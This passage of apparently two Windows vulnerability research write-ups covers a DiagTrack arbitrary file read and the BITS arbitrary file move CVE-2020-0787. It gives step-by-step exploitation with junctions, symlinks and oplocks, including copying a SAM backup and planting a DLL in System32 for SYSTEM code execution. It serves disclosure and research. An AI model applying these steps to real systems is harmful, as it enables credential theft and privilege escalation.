The CreateFile operations originated from a call to DeleteFileW() in diagtrack.dll.

The Arbitrary File Read Vulnerability

The files are not moved with a call to MoveFileW() or copied with a call to CopyFileW() and we cannot control the destination folder so, a local attacker wouldn’t be able to leverage this operation to move/copy an arbitrary file to an arbitrary location. Instead, each file is read and then the content is written to a new file in C:\ProgramData\[...]\SoftLandingStage\. In a way, it’s a manual file copy operation.

The one thing we can fully control though is the source folder because it’s owned by the currently logged-on user. The second thing to consider is that the destination folder is readable by Everyone. It means that, by default, new files created in this folder are also readable by Everyone so this privileged file operation may still be abused.

For example, we could replace the C:\Users\lab-user\AppData\Local\Packages\[…]\Tips folder with a mountpoint to an Object Directory and create pseudo symbolic links to point to any file we want on the file system.

If a backup of the SAM file exists, we could create a symlink such as follows in order to get a copy of the file.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC\Control\file1.xml -> \??\C:\Windows\Repair\SAM

Theoretically, if the service tries to open file1.xml, it would be redirected to C:\Windows\Repair\SAM. So, it would read its content and copy it to C:\ProgramData\[…]\SoftLandingStage\file1.xml, making it readable by any local user. Easy, right?! :sunglasses:

Well… Wait a minute. We have two problems here. :confused:

  1. The FindFirstFileW() call on the Tips folder would fail because the target of the mountpoint isn’t a “real” folder.
  2. The new file1.xml file which is created in C:\ProgramData\[…]\SoftLandingStage is deleted at the end of the process.

It turns out that we can work around these two issues using an extra mountpoint, several bait files and a combination of opportunistic locks (see the details in the next parts).

Solving The “FindFirstFileW()” Problem

In order to exploit the behavior described in the previous part, we must find a way to reliably redirect the file read operation to any file we want. But, we cannot use a pseudo symbolic link straight away because of the call to FindFirstFileW().

Note: the Win32 FindFirstFileW() function starts by listing the files which match a given filter in a target directory but this doesn’t make any sense for an Object Directory. To put it simple, you can dir C:\Windows but you cannot dir "\RPC Control".

This first problem is quite simple to address though. Instead of creating a mountpoint to an Object Directory immediately, we can first create a mountpoint to an actual directory, containing some bait files.

First, we would have to create a temporary workspace directory such as follows:

C:\workspace
|__ file1.xml 
|__ file2.xml

Then, we can create the mountpoint:

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> C:\workspace

Doing so, FindFirstFileW() would succeed and return file1.xml. In addition, if we set an OpLock on this file we can partially control the execution flow of the service because the remote procedure would be paused whenever it tries to access it.

When the OpLock is triggered, we can switch the mountpoint to an Object Directory. This is possible because the QueryDirectory operation already occurred and is done only once at the beginning of the FindFirstFileW() call.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC Control\file2.xml -> \??\C:\users\lab-admin\desktop\secret.txt

Note: at this point, we don’t have to create a symbolic link for file1.xml because the service already has a handle on this file.

Thus, when the service opens C:\Users\lab-user\AppData\[…]\Tips\file2.xml, it actually opens secret.txt and copies its content to C:\ProgramData\[…]\SoftLandingStage\file2.xml.

Conclusion: we can trick the service into reading a file we don’t own but, this leads us to the second problem. At the end of the process, C:\ProgramData\[…]\SoftLandingStage\file2.xml is deleted so we wouldn’t be able to read it anyway.

Solving The Final File Delete Problem

Since the target file is deleted at the end of the process, we must win a race against the service and get a copy of the file before this happens. To do so we have two options. The first one would be bruteforce. We could implement the strategy described in the previous part and then monitor the target directory C:\ProgramData\[…]\SoftLandingStage in a loop in order to get a copy of the file as soon as NT AUTHORITY\SYSTEM has finished writing the new XML file.

But, bruteforce is always the option of last resort. Here, we have a second option which is way more reliable but we have to rethink the strategy from the beginning.

Instead of creating two files in our initial temporary workspace directory, we will create three files.

C:\workspace
|__ file1.xml
|__ file2.xml  
|__ file3.xml

The next steps will be the same but, when the OpLock on file1.xml is triggered, we will perform two extra actions.

We will first switch the mountpoint and create two pseudo symbolic links. We must make sure that the file3.xml link points to the actual file3.xml file.

C:\Users\lab-user\AppData\Local\Packages\[…]\Tips -> \RPC Control
\RPC Control\file2.xml -> \??\C:\users\lab-admin\desktop\secret.txt
\RPC Control\file3.xml -> \??\C:\workspace\file3.xml

And, we set a new OpLock on file3.xml before releasing the first one.

Thanks to this trick, will are able to influence the service as follows:

  1. DiagTrack tries to read file1.xml and hits the first OpLock.
  2. At this point, we switch the mountpoint, create the two symlinks and set an OpLock on file3.xml.
  3. We release the first OpLock (file1.xml).
  4. DiagTrack copies file1.xml and file2.xml which points to secret.txt.
  5. DiagTrack tries to read file3.xml and hits the second OpLock.
  6. This is the crucial part. At this point, the remote procedure is paused so we can get a copy of C:\ProgramData\[…]\SoftLandingStage\file2.xml, which is itself a copy of secret.txt.
  7. We release the second OpLock (file3.xml).
  8. The remote procedure terminates and the three XML files are deleted.

Note: this trick works because the process performed by DiagTrack is done sequentially. Each file is copied one after each other and all newly created files are deleted at the very end.

This results in a reliable exploit which allows a normal user to get a copy of any file readable as NT AUTHORITY\SYSTEM. Here is a screenshot showing the PoC I developped.

Links & Resources

CVE-2020-0787 - Windows BITS - An EoP Bug Hidden in an Undocumented RPC Function

This post is about an arbitrary file move vulnerability I found in the Background Intelligent Transfer Service. This is yet another example of a privileged file operation abuse in Windows 10. There is nothing really new but the bug itself is quite interesting because it was hidden in an undocumented function. Therefore, I will explain how I found it and I will also share some insights about the reverse engineering process I went through in order to identify the logic flaw. I hope you’ll enjoy reading it as much as I enjoyed writing it.

TL;DR

If you don’t know this Windows feature, here is a quote from Microsoft documentation (link).

Background Intelligent Transfer Service (BITS) is used by programmers and system administrators to download files from or upload files to HTTP web servers and SMB file shares. BITS will take the cost of the transfer into consideration, as well as the network usage so that the user’s foreground work has as little impact as possible. BITS also handles network interuptions, pausing and automatically resuming transfers, even after a reboot.

This service exposes several COM objects, which are different iterations of the “Control Class” and there is also a “Legacy Control Class”. The latter can be used to get a pointer to the legacy IBackgroundCopyGroup interface, which has two undocumented methods: QueryNewJobInterface() and SetNotificationPointer().

If a user invokes the CreateJob() method of the IBackgroundCopyGroup interface (i.e. the legacy one), he/she will get a pointer to the old IBackgroundCopyJob1 interface. On the other hand, if he/she invokes the QueryNewJobInterface() method of this same interface, he/she will get a pointer to the new IBackgroundCopyJob interface.

The issue is that this call was handled by the service without impersonation. It means that users get a pointer to an IBackgroundCopyJob interface in the context of NT AUTHORITY\SYSTEM. Impersonation is implemented in the other methods though so the impact is limited but there are still some side effects.

When a job is created and a file is added to the queue, a temporary file is created. Once the service has finished writing to the file, it is renamed with the filename specified by the user thanks to a call to MoveFileEx(). The problem is that, when using the interface pointer returned by QueryNewJobInterface(), this last operation is done without impersonation.

A normal user can therefore leverage this behavior to move an arbitrary file to a restricted location using mountpoints, oplocks and symbolic links.

How do the BITS COM Classes work?

The Background Intelligent Transfer Service exposes several COM objects, which can be easily listed using OleViewDotNet (a big thanks to James Forshaw once again).

Here, we will focus on the Background Intelligent Transfer (BIT) Control Class 1.0 and the Legacy BIT Control Class and their main interfaces, which are respectively IBackgroundCopyManager and IBackgroundCopyMgr.

The “new” BIT Control Class

The BIT Control Class 1.0 works as follows:

  1. You must create an instance of the BIT Control Class (CLSID: 4991D34B-80A1-4291-83B6-3328366B9097) and request a pointer to the IBackgroundCopyManager interface with CoCreateInstance().
  2. Then, you can create a “job” with a call to IBackgroundCopyManager::CreateJob() to get a pointer to the IBackgroundCopyJob interface.
  3. Then, you can add file(s) to the job with a call to IBackgroundCopyJob::AddFile(). This takes two parameters: a URL and a local file path. The URL can also be a UNC path.
  4. Finally, since the job is created in a SUSPENDED state, you have to call IBackgroundCopyJob::Resume() and IBackgroundCopyJob::Complete() when the state of the job is TRANSFERRED.
CoCreateInstance(CLSID_4991D34B-80A1-4291-83B6-3328366B9097)   -> IBackgroundCopyManager*
|__ IBackgroundCopyManager::CreateJob()                        -> IBackgroundCopyJob*
    |__ IBackgroundCopyJob::AddFile(URL, LOCAL_FILE) 
    |__ IBackgroundCopyJob::Resume() 
    |__ IBackgroundCopyJob::Complete()  

Although the BIT service runs as NT AUTHORITY\SYSTEM, all these operations are performed while impersonating the RPC client so no elevation of privilege is possible here.

The Legacy Control Class

The Legacy Control Class works a bit differently. An extra step is required at the beginning of the process.

  1. You must create an instance of the Legacy BIT Control Class (CLSID: 69AD4AEE-51BE-439B-A92C-86AE490E8B30) and request a pointer to the IBackgroundCopyQMgr interface with CoCreateInstance().
  2. Then, you can create a “group” with a call to IBackgroundCopyQMgr::CreateGroup() to get a pointer to the IBackgroundCopyGroup interface.
  3. Then, you can create a “job” with a call to IBackgroundCopyGroup::CreateJob() to get a pointer to the IBackgroundCopyJob1 interface.
  4. Then, you can add file(s) to the “job” with a call to IBackgroundCopyJob1::AddFiles(), which takes a FILESETINFO structure as a parameter.
  5. Finally, since the job is created in a SUSPENDED state, you have to call IBackgroundCopyJob1::Resume() and IBackgroundCopyJob1::Complete() when the state of the job is TRANSFERRED.
CoCreateInstance(CLSID_69AD4AEE-51BE-439B-A92C-86AE490E8B30)   -> IBackgroundCopyQMgr*
|__ IBackgroundCopyQMgr::CreateGroup()                         -> IBackgroundCopyGroup*
    |__ IBackgroundCopyGroup::CreateJob()                      -> IBackgroundCopyJob1*
        |__ IBackgroundCopyJob1::AddFiles(FILESETINFO)
        |__ IBackgroundCopyJob1::Resume()
        |__ IBackgroundCopyJob1::Complete()

Once again, although the BIT service runs as NT AUTHORITY\SYSTEM, all these operations are performed while impersonating the RPC client so no elevation of privilege is possible here either.

The use of these two COM classes and their interfaces is well documented on MSDN here and here. However, while trying to understand how the IBackgroundCopyGroup interface worked, I noticed some differences between the methods listed on MSDN and its actual Proxy definition.

The documentation of the IBackgroundCopyGroup interface is available here. According to this resource, it has 13 methods. Though, when viewing the proxy definition of this interface with OleViewDotNet, we can see that it actually has 15 methods.

Proc3 to Proc15 match the methods listed in the documentation but Proc16 and Proc17 are not there.

Thanks to the documentation, we know that the corresponding header file is Qmgr.h. If we open this file, we should get an accurate list of all the methods that are available on this interface.

Indeed, we can see the two undocumented methods: QueryNewJobInterface() and SetNotificationPointer().

An Undocumented Method: “QueryNewJobInterface()”

Thanks to OleViewDotNet, we know that the IBackgroundCopyQMgr interface is implemented in qmgr.dll so, we can open it in IDA and see if we can find more information about the IBackgroundCopyGroup interface and the two undocumented methods I mentionned.

The QueryNewJobInterface() method requires 1 parameter: an interface identifier (REFIID iid) and returns a pointer to an interface (IUnknown **pUnk). The prototype of the function is as follows:

virtual HRESULT QueryNewJobInterface(REFIID iid, IUnknown **pUnk);

First, the input GUID (Interface ID) is compared against a hardcoded value (1): 37668d37-507e-4160-9316-26306d150b12. If it doesn’t match, then the function returns the error code 0x80004001 (2) – “Not implemented”. Otherwise, it calls the GetJobExternal() function from the CJob Class (3).

The hardcoded GUID value (37668d37-507e-4160-9316-26306d150b12) is interesting. It’s the value of IID_IBackgroundCopyJob. We can find it in the Bits.h header file.

The Arbitrary File Move Vulnerability

Before going any further into the reverse engineering process, we could make an educated guess based on the few information that was collected.

  • The name of the undocumented method is QueryNewJobInterface().
  • It’s exposed by the IBackgroundCopyGroup interface of the Legacy BIT Control Class.
  • The GUID of the “new” IBackgroundCopyJob interface is involved.

Therefore, we may assume that the purpose of this function is to get an interface pointer to the “new” IBackgroundCopyJob interface from the Legacy Control Class.

In order to verify this assumption, I created an application that does the following:

  1. It creates an instance of the Legacy Control Class and gets a pointer to the legacy IBackgroundCopyQMgr interface.
  2. It creates a new group with a call to IBackgroundCopyQMgr::CreateGroup() to get a pointer to the IBackgroundCopyGroup interface.
  3. It creates a new job with a call to IBackgroundCopyGroup::CreateJob() to get a pointer to the IBackgroundCopyJob1 interface.
  4. It adds a file to the job with a call to IBackgroundCopyJob1::AddFiles().
  5. And here is the crucial part, it calls the IBackgroundCopyGroup::QueryNewJobInterface() method and gets a pointer to an unknown interface but we will assume that it’s an IBackgroundCopyJob interface.
  6. It finally resumes and complete the job by calling Resume() and Complete() on the IBackgroundCopyJob interface instead of the IBackgroundCopyJob1 interface.

In this application, the target URL is \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts (we don’t want to depend on a network access) and the local file is C:\Temp\test.txt.

Then, I analyzed the behavior of the BIT service with Procmon.

First, we can see that the service creates a TMP file in the target directory and tries to open the local file that was given as an argument, while impersonating the current user.

Then, once we call the Resume() function, the service starts reading the target file \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts and writes its content to the TMP file C:\Temp\BITF046.tmp, still while impersonating the current user as expected.

Finally, the TMP file is renamed as test.txt with a call to MoveFileEx() and, here is the flaw! While doing so, the current user isn’t impersonated anymore, meaning that the file move operation is done in the context of NT AUTHORITY\SYSTEM.

The following screenshot confirms that the SetRenameInformationFile call originated from the Win32 MoveFileEx() function.

This arbitrary file move as SYSTEM results in an Local Privilege Escalation. By moving a specifically crafted DLL to the System32 folder, a regular user may execute arbitrary code in the context of NT AUTHORITY\SYSTEM as we will see in the final “Exploit” part.

Finding the Flaw

Before trying to find the flaw in the QueryNewJobInterface() function itself, I first tried to understand how the “standard” CreateJob() method worked.

The CreateJob() method of the IBackgroundCopyGroup interface is implemented in the COldGroupInterface class on server side.

It’s not obvious here because of CFG (Control Flow Guard) but this function calls the CreateJobInternal() method of the same class if I’m not mistaken.

This function starts by invoking the ValidateAccess() method of the CLockedJobWritePointer class, which calls the CheckClientAccess() method of the CJob class.

The CheckClientAccess() method is where the token of the user is checked and is applied to the current thread for impersonation.

Eventually, the execution flow goes back to the CreateJobInternal() method, which calls the GetOldJobExternal() method of the CJob class and returns a pointer to the IBackgroundCopyJob1 interface to the client

The calls can be summarized as follows:

(CLIENT) IBackgroundCopyGroup::CreateJob()
   |
   V
(SERVER) COldGroupInterface::CreateJob()
         |__ COldGroupInterface::CreateJobInternal()
             |__ CLockedJobWritePointer::ValidateAccess()
             |   |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::GetOldJobExternal() // IBackgroundCopyJob1* returned

Now that we know how the CreateJob() method works overall, we can go back to the reverse engineering of the QueryNewJobInterface() method.

We already saw that if the supplied GUID matches IID_IBackgroundCopyJob, the following piece of code is executed.

That’s where the new interface pointer is queried and returned to the client with an immediate call to CJob::GetExternalJob(). Therefore, it can simply be summarized as follows:

(CLIENT) IBackgroundCopyGroup::QueryNewJobInterface()
   |
   V
(SERVER) COldGroupInterface::QueryNewJobInterface()
         |__ CJob::GetJobExternal() // IBackgroundCopyJob* returned

We can see a part of the issue now. It seems that, when requesting a pointer to a new IBackgroundCopyJob interface from IBackgroundCopyGroup with a call to the QueryNewJobInterface() method, the client isn’t impersonated. This means that the client gets a pointer to an interface which exists within the context of NT AUTHORITY\SYSTEM (if that makes any sense).

The problem isn’t that simple though. Indeed, I noticed that the file move operation occurred after the call to IBackgroundCopyJob::Resume() and before the call to IBackgroundCopyJob::Complete().

Here is a very simplified call trace when invoking IBackgroundCopyJob::Resume():

(CLIENT) IBackgroundCopyJob::Resume()
   |
   V
(SERVER) CJobExternal::Resume()
         |__ CJobExternal::ResumeInternal()
             |__ ...
             |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::Resume()
             |__ ...

Here is a very simplified call trace when invoking IBackgroundCopyJob::Complete():

(CLIENT) IBackgroundCopyJob::Complete()
   |
   V
(SERVER) CJobExternal::Complete()
         |__ CJobExternal::CompleteInternal()
             |__ ...
             |__ CJob::CheckClientAccess() // Client impersonation
             |__ CJob::Complete()
             |__ ...

In both cases, the client is impersonated. This means that the job wasn’t completed by the client. It was completed by the service itself, probably because there was no other file in the queue.

So, when a IBackgroundCopyJob interface pointer is received from a call to IBackgroundCopyGroup::QueryNewJobInterface() and the job is completed by the service rather than the RPC client, the final CFile::MoveTempFile() call is done without impersonation. I was not able to spot the exact location of the logic flaw but I think that adding the CJob::CheckClientAccess() check in COldGroupInterface::QueryNewJobInterface() would probably solve the issue.

Here is a simplified graph showing the functions that lead to a MoveFileEx() call in the context of a CJob object.

How to Exploit this Vulnerability?

The exploit strategy is pretty straightforward. The idea is to give the service a path to a folder that will initially be used as a junction to another “physical” directory. We create a new job with a local file to “download” and set an Oplock on the TMP file. After resuming the job, the service will start writing to the TMP file while impersonating the RPC client and will hit the Oplock. All we need to do then is to switch the mountpoint to an Object Directory and create two symbolic links. The TMP file will point to any file we own and the “local” file will point to a new DLL file in the System32 folder. Finally, after releasing the Oplock, the service will continue writing to the original TMP file but it will perform the final move operation through our two symbolic links.

1) Prepare a workspace

The idea is to create a directory with the following structure:

<DIR> C:\workspace
|__ <DIR> bait
|__ <DIR> mountpoint
|__ FakeDll.dll

The purpose of the mountpoint directory is to switch from a junction to the bait directory to a junction to the RPC Control Object Directory. FakeDll.dll is the file we want to move to a restricted location such as C:\Windows\System32\.

2) Create a mountpoint

We want to create a mountpoint from C:\workspace\mountpoint to C:\workspace\bait.

3) Create a new job

We’ll use the interfaces provided by the Legacy Control Class to create a new job with the following parameters.

Target URL: \\127.0.0.1\C$\Windows\System32\drivers\etc\hosts
Local file: C:\workspace\mountpoint\test.txt

Because of the junction that was previously created, the real path of the local file will be C:\workspace\bait\test.txt.

4) Find the TMP file and set an Oplock

When adding a file to the job queue, the service immediately creates a TMP file. Since it has a “random” name, we have to list the content of the bait directory to find it. Here, we should find a name like BIT1337.tmp. Once we have the name, we can set an Oplock on the file.

5) Resume the job and wait for the Oplock

As mentioned earlier, as soon as the job is resumed, the service will open the TMP file for writing and will trigger the Oplock. This technique allows us to pause the operation and therefore easily win the race.  

6) Switch the mountpoint

Before this step:

TMP file   = C:\workspace\mountpoint\BIT1337.tmp -> C:\workspace\bait\BIT1337.tmp
Local file = C:\workspace\mountpoint\test.txt -> C:\workspace\bait\test.txt

We switch the mountpoint and create the symbolic links:

C:\workspace\mountpoint -> \RPC Control
Symlink #1: \RPC Control\BIT1337.tmp -> C:\workspace\FakeDll.dll
Symlink #2: \RPC Control\test.txt -> C:\Windows\System32\FakeDll.dll

After this step:

TMP file   = C:\workspace\mountpoint\BIT1337.tmp -> C:\workspace\FakeDll.dll
Local file = C:\workspace\mountpoint\test.txt -> C:\Windows\System32\FakeDll.dll

7) Release the Oplock and complete the job

After releasing the Oplock, the CreateFile operation on the original TMP file will return and the service will start writing to C:\workspace\bait\BIT1337.tmp. After that the final MoveFileEx() call will be redirected because of the symbolic links. Therefore, our DLL will be moved to the System32 folder.

Because it’s a move operation, the properties of the file are preserved. This means that the file is still owned by the current user so it can be modified afterwards even if it’s in a restricted location.

8) (Exploit) Code execution as System

To get code execution as System, I used the arbitrary file move vulnerability to create the WindowsCoreDeviceInfo.dll file in the System32 folder. Then, I leveraged the Update Session Orchestrator service to load the DLL as System.

Demo

Links & Resources

❌